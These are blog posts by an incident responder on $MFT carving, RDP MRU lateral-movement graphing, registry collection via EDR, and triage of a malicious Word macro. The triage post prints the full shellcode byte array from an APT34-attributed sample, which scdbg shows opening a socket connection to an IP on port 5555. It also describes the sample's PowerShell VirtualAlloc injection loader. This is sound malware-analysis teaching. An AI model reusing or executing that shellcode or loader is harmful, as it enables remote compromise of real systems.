Carving $MFT (MFTEntryCarver.py)

Another story on how you might discover new artifacts to help your investigation – MFT Carving.

It’s been some time since I wrote my last blog post. Like every year, the last quarter is very busy. Still, I have something new I want to share. This week I have been teaching SANS FOR508 with Francesco Picasso (@dfirfpi) in Paris. When Francesco talked about $MFT entries, I got curious where on a drive single $MFT entries or groups of entries might end up other than in the currently active $MFT. I briefly googled for solutions that support carving single, potentially corrupted $MFT entries and couldn’t find any. There are many tools that parse a complete, active $MFT, and tools that carve files, but that’s not what I was looking for. So back in my room I started to do some research.

As the $MFT is literally filled with timestamps, I figured it might come in handy to have an MFT carver/parser that also handles partially corrupted entries. If you just want the tool I wrote and don’t want to read the whole blog post, feel free to download it at https://github.com/cyb3rfox/MFTEntryCarver/

As pointed out, I did not expect to find many entries in unallocated space, but I gave it a try anyhow. First of all, I dumped the unallocated space of a test Windows 7 image using The Sleuth Kit’s blkls.

blkls image.ewf > unallocated.blocks

This produced a file around 7 GB in size. To see whether it would even make sense to start writing something, I just ran a strings search on the file.

strings -a unallocated.blocks | grep FILE0 | wc -l
Counting the potential number of $MFT entries

Note that strictly speaking FILE (\x46\x49\x4C\x45) is the header of an entry, but searching for it alone yields many hits that are just part of text files and scripts. Still, most if not all entries start with FILE0 (\x46\x49\x4C\x45\x30): the byte \x30 is the offset to the fixup values, which is the same for the vast majority of entries, and since it happens to be ASCII ‘0’ it is easy to grep for. Anyway, the above command leads to the following output.

So it looks like we have 5026 potential $MFT entries. Next, I wanted to understand how those artifacts are distributed across the dump file. Hence, I searched for the magic bytes again, only this time I also recorded the offsets of the hits.

strings -a -t d unallocated.blocks | grep FILE0
Figuring out the entry offsets for plotting

I then grouped the hit offsets into a manageable number of buckets and plotted a histogram.

Histogram of $MFT entries in the dumped unallocated space
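If you want to reproduce such a plot, a few lines of Python are enough. This is a minimal sketch using matplotlib, fed with the output of the strings command above; the bucket count of 100 is an arbitrary choice:

import sys
import matplotlib.pyplot as plt

# Pipe in `strings -a -t d unallocated.blocks | grep FILE0`;
# the first column of each line is the decimal offset of a hit.
offsets = [int(line.split()[0]) for line in sys.stdin]

plt.hist(offsets, bins=100)  # group the offsets into 100 buckets
plt.xlabel("Offset in dump file")
plt.ylabel("Number of FILE0 hits")
plt.show()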

The histogram shows that those entries are not all clustered in one place but sit in at least three separate locations (there are some less populated sections that don’t show on the graph).
That implies that the entries might come from different sources. Interesting enough for me to start writing a little tool. The $MFT is very well documented; I used two resources to understand what I needed to do.

I guess this is the time to point out that I’m obviously not a full-time coder and Python is quite new to me. If you don’t believe me, look at the code and you’ll see what I mean. So please excuse my spaghetti code. In the end, it works and is even reasonably fast.

I wanted the tool to be able to do the following things:

  • Find potential $MFT file entries
  • Parse as many of their $FN attributes (long and short names) as possible
  • Parse $STDInfo and $FN timestamps
  • For resident $DATA attributes, recover the data as well
  • Still work if half of the information is corrupted
  • Output everything in CSV format

So, first of all, I needed to find all potential $MFT entries. As the input files for this kind of tool can get quite big, any method that needs to load the whole file into memory might fail. In the end, I decided to use Python’s mmap library. It’s fast, you can open really big files and move a pointer over the data, and searching for byte patterns is supported.
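To illustrate the idea (a simplified sketch, not the exact code from MFTEntryCarver.py), this is roughly what the mmap-based search looks like:

import mmap

MAGIC = b"FILE"  # \x46\x49\x4C\x45 -- start of a potential $MFT entry

def candidate_offsets(path):
    # Yield offsets of potential entries without reading the file into RAM.
    with open(path, "rb") as f, mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ) as mm:
        pos = mm.find(MAGIC, 0)
        while pos != -1:
            yield pos
            pos = mm.find(MAGIC, pos + 1)

for off in candidate_offsets("unallocated.blocks"):
    print(off)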

The pattern search for FILE (\x46\x49\x4C\x45) returned 54583 potential entries. So how do I decide which are legitimate and which are false positives? My approach was to try to parse further attributes and sanity-check the results as well as possible. For example, I use size checks a lot. All attributes in $MFT entries store their size; I parse that, and if the parsed value is smaller than the minimum size of the attribute or bigger than the size of the whole entry, the bytes I parsed are probably not part of a real $MFT entry. I don’t want to go into that too deeply; please look at the code if you want to understand my approach. Suggestions and contributions are highly welcome.
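As an illustration of such a size check (again a sketch of the idea, not the actual tool code): an NTFS attribute header stores its total length four bytes in, so the check boils down to a couple of comparisons.

import struct

ENTRY_SIZE = 1024   # standard $MFT entry size
MIN_ATTR_LEN = 16   # an attribute header can't be smaller than this

def attribute_length_plausible(entry, attr_offset):
    # Return False if the attribute's length field can't belong to a real entry.
    if attr_offset + 8 > len(entry):
        return False
    # Attribute header: type (4 bytes), then total length (4 bytes, little-endian)
    attr_len = struct.unpack_from("<I", entry, attr_offset + 4)[0]
    return MIN_ATTR_LEN <= attr_len <= ENTRY_SIZE - attr_offset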

So after a couple of hours of work, I got the following results.

python MFTEntryCarver.py -s unallocated.blocks
MFTEntryCarver.py output; the -s flag shows statistics at the end

So essentially, MFTEntryCarver.py will give you all the artifacts mentioned above if it can find them. It only keeps parsing an entry when it finds at least one valid $FN attribute. If certain artifacts are not there, it writes “corrupted” into the respective field. Below are the statistics the tool shows after processing the test dataset.

The good news: in the end, there were not only 5026 entries to parse but a total of 54583. Out of those, MFTEntryCarver.py recovered 14975 entries. So let’s take a look at one of them.

[u'GETWIN~1.URL', u'Get Windows Live.url'];2010-11-10 08:22:22.646273;2010-11-10 08:22:22.646273;2010-11-10 08:22:22.646273;2010-11-10 08:22:22.646273;1601-01-01 00:00:00;1601-01-01 00:00:00;1601-01-01 00:00:00;1601-01-01 00:00:00;0d0a50726f70333d31392c320d0a5b496e7465726e657453686f72746375745d0d0a55524c3d3c0174703a2f2f676f2e6d6963726f736f66742e636f6d2f66776c696e6b2f3f4c696e6b49643d36393137320d0a49444c6973743d0d0a794711

So, in this case, we found a .URL file called “Get Windows Live.url”, and the data seems to be resident. Some timestamps couldn’t be parsed; MFTEntryCarver.py still gets you as much as it can. I usually transform and analyze raw hex data using CyberChef. Throwing the hex contents of the resident data attribute at it produces readable results (at least for ASCII characters).

CyberChef can parse the resident data
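If you prefer to stay on the command line, Python’s bytes.fromhex does the same job. The hex string below is truncated for brevity; paste the full value from the CSV field:

hex_blob = "0d0a50726f70333d31392c32"  # truncated -- use the full hex string
raw = bytes.fromhex(hex_blob)
print(raw.decode("ascii", errors="replace"))  # prints "\r\nProp3=19,2..." for this entry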

I’ll try the tool some more in investigations, but it looks promising and offers a viable way to get at older $MFT entries, including timestamps. Artifacts like these usually help an investigation when the attacker has cleaned up and/or is long gone. If you use it, please give some feedback. You can easily reach me on Twitter @mathias_fuchs. You can get the code at https://github.com/cyb3rfox/MFTEntryCarver

Quick Office Document Triage

As people quite frequently ask me how I triage potentially malicious Microsoft Office documents, I decided to run through a quick analysis here. 

Our specimen for this tutorial is a Word document out of the malware collection published by @0xffff0800 on http://iec56w4ibovnb4wc.onion (the URL might change; check the current address at 0day.coffee). @0xffff0800 attributes the file to an Iranian threat actor dubbed APT34 by Mandiant/FireEye. You can download the file directly from the repository or from VirusTotal (https://www.virustotal.com/#/file/db53b4157868fffd0331c1498e2209c11499b14f5aa980fe4fb3453858ed90b5/detection)

Specimen Details

Filename: MagicHoundAPT34.doc
SHA1: 9ff035e1d7517ac3c081a1a25382fa862dd1f87d
Size: 39’936 bytes

This is how the file looks when you open it in Word (don’t do it, but if you really have to, don’t enable macros 😜)

As you can see, they didn’t really care about crafting a nice fake document. I trust your red team does better than that.

Triage vs. Full Analysis 

The main goal of a triage is to allow a moderately experienced forensic analyst, who probably has no background in malware reverse engineering, to figure out whether a document is malicious and even get some IOCs out of it. The approach I’m suggesting here is low-risk, as it works completely without opening the file in Microsoft Word or executing any PowerShell code. For the sake of completeness, I’ll give some hints on how a malware analyst could continue dissecting the malware.

Tools used

oledump.py, a text editor (I use Sublime Text), base64, CyberChef, scdbg and jmp2it.

1.) Finding the Macro

We are looking at an old Word document format, as indicated by the .doc suffix. Those documents are stored in the OLECF file format (further reading). Oledump is a nice tool written in Python that allows you to extract the various streams contained in an OLECF file. So let’s take a closer look at the file and see if it is even malicious.

oledump.py MagicHoundAPT34.doc 

This scans the file for all subelements in the compound file. For the given specimen it shows the following output. Note stream number 7: it is the only stream that contains a macro.

Scanning the document

Oledump offers a fast and easy way to extract individual streams. As macros are usually stored compressed, we also need the -v flag to decompress the content.

Stream 7 in uncompressed form

Looking at the macro, what we see are typical PowerShell parameters and a lot of base64-encoded sections. Let’s dump the macro into a separate file to look at it more closely.

oledump.py -s7 -v MagicHoundAPT34.doc > macro.txt 

2.) Revealing the actual code

Looking at the macro in the text editor of your choice (I use Sublime Text), preferably one that supports syntax highlighting, we see that the main payload seems to be PowerShell-based; the VB macro only executes PowerShell and shows an error message.

powershell.exe called using the VB Shell command

So apparently we need to decode the base64-encoded PowerShell source next. You probably noticed that it is not a single string block but multiple concatenated string blocks. So we need to clean that up a bit, save the result to a file called base64.txt and then decode it into a new file.

Mac OS:
base64 -D < base64.txt > powershell1.txt
Most Linux:
base64 -d base64.txt > powershell1.txt
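If you’d rather script the cleanup than do it by hand, something like this works too. It’s a sketch that assumes the base64 chunks appear as quoted string literals in macro.txt; adjust the regex if the macro quotes them differently:

import base64
import re

# Collect the quoted, base64-looking string literals from the dumped macro
# and decode them as one blob.
with open("macro.txt") as f:
    macro = f.read()

chunks = re.findall(r'"([A-Za-z0-9+/=]{16,})"', macro)
with open("powershell1.txt", "wb") as f:
    f.write(base64.b64decode("".join(chunks)))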

That gives us an interesting piece of PowerShell code. At first we see that there seems to be some additional PowerShell code in a string variable called $G8t. At the end of the file, that same PowerShell code gets base64-encoded again and then executed with the 32-bit version of PowerShell (note the location of powershell.exe in a subfolder of SysWOW64). A very common reason to use 32-bit binaries is that the attacker happens to have 32-bit shellcode he wants to execute; that code wouldn’t run in a 64-bit process. So let’s look for some shellcode. I’m sure you spotted it already: the variable called $z is an array of byte values. If you look at the code more closely you see that the attacker leverages the memset function to write the shellcode byte by byte into memory he allocated using VirtualAlloc. The code is even flexible about the shellcode size: normally it allocates $g bytes, which would be 1000 bytes, but if the shellcode is longer it changes $g to reflect the actual size.

PowerShell code in powershell1.txt

For an incident responder with no malware analysis background, that would be the right moment to hand the sample over to a malware analyst. 

3.) Extracting and analysing the shellcode 

If you don’t know what shellcode is, Wikipedia has an easy-to-read article on the topic. So let’s extract the shellcode as hex first. It looks like this.

0xba,0xf7,0xc6,0x4e,0x03,0xd9,0xeb,0xd9,0x74,0x24,0xf4,0x58,0x31,0xc9,0xb1,0x47,0x31,0x50,0x13,0x03,0x50,0x13,0x83,0xe8,0x0b,0x24,0xbb,0xff,0x1b,0x2b,0x44,0x00,0xdb,0x4c,0xcc,0xe5,0xea,0x4c,0xaa,0x6e,0x5c,0x7d,0xb8,0x23,0x50,0xf6,0xec,0xd7,0xe3,0x7a,0x39,0xd7,0x44,0x30,0x1f,0xd6,0x55,0x69,0x63,0x79,0xd5,0x70,0xb0,0x59,0xe4,0xba,0xc5,0x98,0x21,0xa6,0x24,0xc8,0xfa,0xac,0x9b,0xfd,0x8f,0xf9,0x27,0x75,0xc3,0xec,0x2f,0x6a,0x93,0x0f,0x01,0x3d,0xa8,0x49,0x81,0xbf,0x7d,0xe2,0x88,0xa7,0x62,0xcf,0x43,0x53,0x50,0xbb,0x55,0xb5,0xa9,0x44,0xf9,0xf8,0x06,0xb7,0x03,0x3c,0xa0,0x28,0x76,0x34,0xd3,0xd5,0x81,0x83,0xae,0x01,0x07,0x10,0x08,0xc1,0xbf,0xfc,0xa9,0x06,0x59,0x76,0xa5,0xe3,0x2d,0xd0,0xa9,0xf2,0xe2,0x6a,0xd5,0x7f,0x05,0xbd,0x5c,0x3b,0x22,0x19,0x05,0x9f,0x4b,0x38,0xe3,0x4e,0x73,0x5a,0x4c,0x2e,0xd1,0x10,0x60,0x3b,0x68,0x7b,0xec,0x88,0x41,0x84,0xec,0x86,0xd2,0xf7,0xde,0x09,0x49,0x90,0x52,0xc1,0x57,0x67,0x95,0xf8,0x20,0xf7,0x68,0x03,0x51,0xd1,0xae,0x57,0x01,0x49,0x07,0xd8,0xca,0x89,0xa8,0x0d,0x66,0x8f,0x3e,0x6e,0xdf,0x85,0xac,0x06,0x22,0x9a,0xc5,0x65,0xab,0x7c,0xb5,0xd9,0xfc,0xd0,0x75,0x8a,0xbc,0x80,0x1d,0xc0,0x32,0xfe,0x3d,0xeb,0x98,0x97,0xd7,0x04,0x75,0xcf,0x4f,0xbc,0xdc,0x9b,0xee,0x41,0xcb,0xe1,0x30,0xc9,0xf8,0x16,0xfe,0x3a,0x74,0x05,0x96,0xca,0xc3,0x77,0x30,0xd4,0xf9,0x12,0xbc,0x40,0x06,0xb5,0xeb,0xfc,0x04,0xe0,0xdb,0xa2,0xf7,0xc7,0x50,0x6a,0x62,0xa8,0x0e,0x93,0x62,0x28,0xce,0xc5,0xe8,0x28,0xa6,0xb1,0x48,0x7b,0xd3,0xbd,0x44,0xef,0x48,0x28,0x67,0x46,0x3d,0xfb,0x0f,0x64,0x18,0xcb,0x8f,0x97,0x4f,0xcd,0xec,0x41,0xa9,0xbb,0x1c,0x52

I want to use CyberChef to create a binary file out of the shellcode. For that to work, I need to get rid of either all the 0x prefixes or the commas, as CyberChef only accepts one separator. I’ll get rid of the commas and paste the result into CyberChef’s input window. Selecting the “From Hex” recipe gives me some gibberish characters in the output window. That’s exactly how machine code looks when rendered as ASCII. So let’s save that to a file by clicking the save icon. I choose shellcode.bin.

Creating binary shellcode from the HEX string
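The same conversion is easy to script if CyberChef isn’t at hand. A sketch (the byte array is truncated here; paste the full one from the PowerShell code):

# Turn the 0x..-style, comma-separated byte array into raw shellcode.
shellcode_text = "0xba,0xf7,0xc6,0x4e"  # truncated -- paste the full array here

raw = bytes(int(token, 16) for token in shellcode_text.split(","))
with open("shellcode.bin", "wb") as f:
    f.write(raw)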

So now that we have the shellcode, what do we do next? Shellcode is not a complete binary; it usually uses functions provided by the operating system, in this case Windows, to do whatever it needs to do. There is more than one way to run it anyhow. For a first glance, I’ll use a tool called scdbg, which lets us run shellcode without first wrapping it in a complete Windows executable. The downside is that we can’t really debug it from there. One note: if you do the same thing, be aware that scdbg actually executes the code. This can definitely harm your system. So let’s see if we can get it to run.

Shellcode loaded into scdbg
Results after running the shellcode through scdbg

OK, so now we know a bit more about the shellcode. It seems to leverage WSASocket to open a connection to a local IP address on port 5555. This IP is not in the subnet of the analysis workstation, so there is no way it would get a response. Wouldn’t it be nice if we could look more closely at what it is trying to do there? I guess it is worth a try. There is a nice little tool written by Adam Kramer called jmp2it that can help us out: it allows us to debug the shellcode. But that’s already way beyond simple malware triage for incident responders. I’ll put up a separate blog entry on how to proceed with that sample as soon as I have time. So happy hunting and have a great weekend.

Attackers and RDP MRUs

Now I finally got the time to continue with mapping the data out of my Tanium RDP MRU Sensor.

But first a couple of things. Two people responded to my last blog entry and pointed me at the HKEY_USERS hive (HKU) as an easier way to get my data. And they are partly right. HKU holds the ntuser.dat content for all active users. The problem is that “active users” means actively logged-on users. So for my scenario, investigating lateral RDP movement, this is not enough. Long story short, you’ll still need some coding if you want to get all the information.

Today I acquired some data from a test network at my workplace using Tanium. As it is Sunday, it contains only a small subset of the machines that are usually there. So the dataset contains mostly servers, including a fair share of jumpservers, which actually makes it a good dataset to start with.

My test dataset

My theory is that if an attacker uses a known account, or possibly even an account he created himself, we should be able to follow his trail through the network. What I’m looking for is something like this.

Expected outcome

Creating a graph like that requires source, destination and username for each RDP MRU. That’s nice because I already have that as CSV, exported out of my Tanium sensor results. To see something that looks like an attack, I added some fake data into the mix: essentially someone using an account called “attacker” who jumps from a notebook to a jumpserver, from there to another server, and yet another server, and so on; you get the idea. I also assume that I’ll discover some logon habits of the people on the test systems along the way.

Once the data is ready, the question is how to filter it, plot it and do that all over again to support dynamic analysis. After some searching I decided to start with an existing tool rather than building something myself. The tool I chose is Gephi (https://gephi.org), a very well known graphing application in data science. Best of all, it’s free.
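Getting the CSV into a shape Gephi understands takes only a small conversion script. This sketch assumes hypothetical column names (source_host, target_host, username); adjust them to whatever your sensor export actually uses:

import csv

# Convert the sensor export into a Gephi-style edge list:
# one row per RDP connection, labeled with the account that made it.
with open("rdp_mru.csv", newline="") as src, open("edges.csv", "w", newline="") as dst:
    reader = csv.DictReader(src)
    writer = csv.writer(dst)
    writer.writerow(["Source", "Target", "Label"])
    for row in reader:
        writer.writerow([row["source_host"], row["target_host"], row["username"]])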

So I had to figure out how the tool works. After investing an hour on it, I got pretty much the result I wanted.

Plotting the full dataset

The first thing I checked was the most active user in the dataset. The data immediately shows typical administrative behavior – quite disciplined, though. Looking up the username, it is indeed an administrator. So even if the data looked chaotic at first, graphing it did allow me to draw conclusions.
For obvious reasons I had to remove the node names (hostnames) from the picture. The two central nodes are jumpservers and thus the target for connections from this user. The more remote nodes are servers the admin jumped to via the jumpservers. The fat line between the two jumpservers indicates that the administrator used both of his accounts to move between the servers in both directions, which is perfectly in line with the policy.

Normal admin

So let’s see what a simulated attack looks like. My assumption here is that the attacker used an account that normally never uses RDP, or an account he created himself for lateral movement. Thus, filtering for the username in the dataset will only show the adversary moving. If the attacker uses more than one account, it’s perfectly possible and even quite easy to plot all the activity in one run.

Simulated attacker

I’m quite happy with the results and plan to give it a shot in a bigger, real network. It opens up a new way of hunting for me, so I guess it was worth the while. There are some additional things I need to mention. First and foremost, finding the attacker’s targets works as long as he uses RDP for lateral movement and you are able to differentiate between legitimate users and attackers. In the worst case you need to check with the owner of the compromised account which hosts he usually accesses using RDP and filter those out.
Having said that, there is a limitation in some networks. As soon as roaming profiles are widely used, the ntuser.dat of the users will be roamed as well. This means the machine an MRU came from is not necessarily the machine where the entry was added to the registry; in that case, real step-by-step tracking no longer works. Secondly, there is almost no timing aspect to this data. You can usually deduce which move came first, but not when it happened. For that you would need to leverage event logs, if they have not rolled already (which they most likely have, as you’d have used them in the first place if you could). The huge advantage is that the data I leveraged here stays on the system for a very long time. I remember the profiles of some admins still being present on my company notebook after I had been in the company for several years; those guys had already left the company by then.

So to summarize, RDP MRUs are a great way to track lateral movement using RDP even a long time after the attacker has left. It does not work as well when profiles are roaming but still gives some value in that case. If you have any questions just ping me on twitter @mathias_fuchs.

Agent-based EDR and HKCU

One day I took out my red SANS poster (link) and figured it might be a good idea to acquire one or another artifact using an EDR – in our case Tanium. I was particularly interested in getting RDP MRUs out of the registry. That’s when the struggle began.

So what are RDP MRUs? Sorry, I’m not gonna explain what RDP stands for, but MRU usually stands for Most Recently Used. Did you ever ask yourself how Windows, or more correctly mstsc.exe – the RDP client distributed with Windows – stores the information it populates its address drop-down menu with? Well, no surprise here – it’s a registry key. As the servers people connect to are usually something you don’t necessarily want to share with every other user on a system (particularly not on a jumphost), those specific keys are stored in the user-specific portion of the registry – HKCU, or HKEY_CURRENT_USER.


As soon as a user logs in, Windows populates the HKCU branch with the contents of the individual’s NTUser.dat hive file. So on a terminal server with many parallel sessions, HKCU is different for every user. So far so good – isn’t it? Well yes, it is for the user, but not so much for the incident responder. This whole process makes every HKCU-based artifact a very dynamic concept. Let’s invest some time to figure out how to leverage it anyway.

So, from the start: the RDP MRUs are stored at HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default in the values MRU0 through MRU<x>, depending on how many historical RDP servers are stored.

The MRU values as shown in the Registry Editor

As depicted above, it’s quite easy to access this data from within an established interactive session (sounds sophisticated, but just means logged on to the Explorer GUI). But what if you want to access the MRUs from an agent on that system, and maybe the MRUs of all users? Well, then it’s a different story. The typical agent-based endpoint solutions run with SYSTEM privileges. SYSTEM is the highest-privileged user on Windows systems – it’s not the typical kind of user, though.
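For the interactive case, reading your own MRUs takes only a few lines – for instance in Python with the standard winreg module:

import winreg

# Enumerate the MRU values of the *current* user -- the easy case.
path = r"Software\Microsoft\Terminal Server Client\Default"
with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
    i = 0
    while True:
        try:
            name, value, _ = winreg.EnumValue(key, i)
        except OSError:
            break  # no more values
        print(name, value)  # e.g. MRU0 server01.example.com
        i += 1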

If you access the registry, namely the HKCU branch, in a SYSTEM context, it seems not to be there (e.g. when using the Tanium Get Registry Value sensor). The same sensor works just fine for HKLM (HKEY_LOCAL_MACHINE) entries. Crap. So what do I do now? Well, actually it’s not surprising that I don’t get a lot of results using that sensor. HKCU is a very private affair – how would Windows know which specific HKCU, or in other words which NTUser.dat, I’m interested in?

So back to the drawing board. What I need the agent to do is something like the following steps:

  1. Figure out how many and which NTUser.dat files exist on the system
  2. Load them into a temporary key under HKLM
  3. Address the desired HKCU key within the temporary key
  4. Rinse and Repeat
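To make those four steps concrete, here is a sketch of what they could look like in Python (assuming SYSTEM/admin rights on Windows; hives of currently logged-on users are locked and will simply fail to load). As the next paragraph explains, the actual sensor had to be built with VBScript/PowerShell instead:

import glob
import subprocess
import winreg

MRU_KEY = r"TempHive\Software\Microsoft\Terminal Server Client\Default"

# Step 1: find the NTUser.dat files (default profile location assumed)
for ntuser in glob.glob(r"C:\Users\*\NTUSER.DAT"):
    # Step 2: load the hive into a temporary key under HKLM
    if subprocess.run(["reg", "load", r"HKLM\TempHive", ntuser],
                      capture_output=True).returncode != 0:
        continue  # hive locked (user logged on) or unreadable
    try:
        # Step 3: address the desired "HKCU" key inside the temporary key
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, MRU_KEY) as key:
            i = 0
            while True:
                try:
                    name, value, _ = winreg.EnumValue(key, i)
                except OSError:
                    break
                if name.startswith("MRU"):
                    print(ntuser, name, value)
                i += 1
    except OSError:
        pass  # this user never used mstsc.exe
    finally:
        # Step 4: unload and move on to the next hive
        subprocess.run(["reg", "unload", r"HKLM\TempHive"], capture_output=True)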

As the solution I wanted this to work on is Tanium, I’m kind of limited to VBScript, PowerShell or WMI – newer versions will support Python as well. I’m not much into any of those languages (besides Python, but most of our customers just haven’t rolled that out yet). So I figured Google was still my friend and could give me all the answers I was looking for. And frankly, it did, but it did so very reluctantly – or I was just tired and couldn’t find a good search term.

I ended up in a GitHub repo where someone needed to write some values into all NTUser.dat hives on a machine. That sounded like a good basis for my sensor. Essentially it follows exactly the steps I drew up above, so the only thing I needed to do was change the write operations to read operations and integrate everything into a Tanium sensor. If you want to implement this in whatever solution you use, the base code is here (https://github.com/micksmix/RegUpdateAllUsers/blob/master/RegUpdateAllHkcuHkcr)

This principle works for all keys under HKCU, thus giving you a whole lot of useful, sometimes even stackable results. Stay tuned for the next post, where I’ll explain what you can do with RDP MRUs when an attacker goes native in an APT3 style (aka doesn’t use malware to pivot).

Another DFIR Blog? Really?

WHY?

I’ve not been maintaining a blog for quite some time now. So why do I feel that it now makes sense to start over again? Well, first and foremost: whenever I develop new fancy threat detection mechanisms and strategies or run incident response engagements in my day job, or when I’m teaching SANS classes around the world, people tell me cool stuff that makes me better at what I am doing. Now it’s time to contribute more to the community and give back what the community gave, and still gives, to me.

WHAT?

I’m not sure yet how this is gonna turn out, but in the end I want to be able to point my customers and my students to my blog when they ask me what the heck I’m doing all day long. I also want to incubate and preserve ideas here. Right now I have ideas for maybe my first 3-4 blog entries. I want to keep those entries technical and make whatever I describe usable for others. The DFIR community is a great community and I’m proud to be in a position to contribute at least a little bit to it.

WHO?

My full name is Mathias Fuchs, but I’d rather go by Mat (yes, just one t – like in my full name). My current day job is building a cyberdefence center in a league of its own, together with awesome colleagues. My office is in Switzerland but I still live in Austria and commute on a weekly basis.

Besides that, I teach the “Advanced Incident Response and Threat Hunting” class for SANS (www.sans.org). I love traveling to conferences and meeting the best of the best – learning from them and maybe also helping them become even better incident responders.


If you have any questions, don’t hesitate to ping me on Twitter, via mail or wherever you can find me. If you look to the right, you can see where I currently am when I’m at conferences.
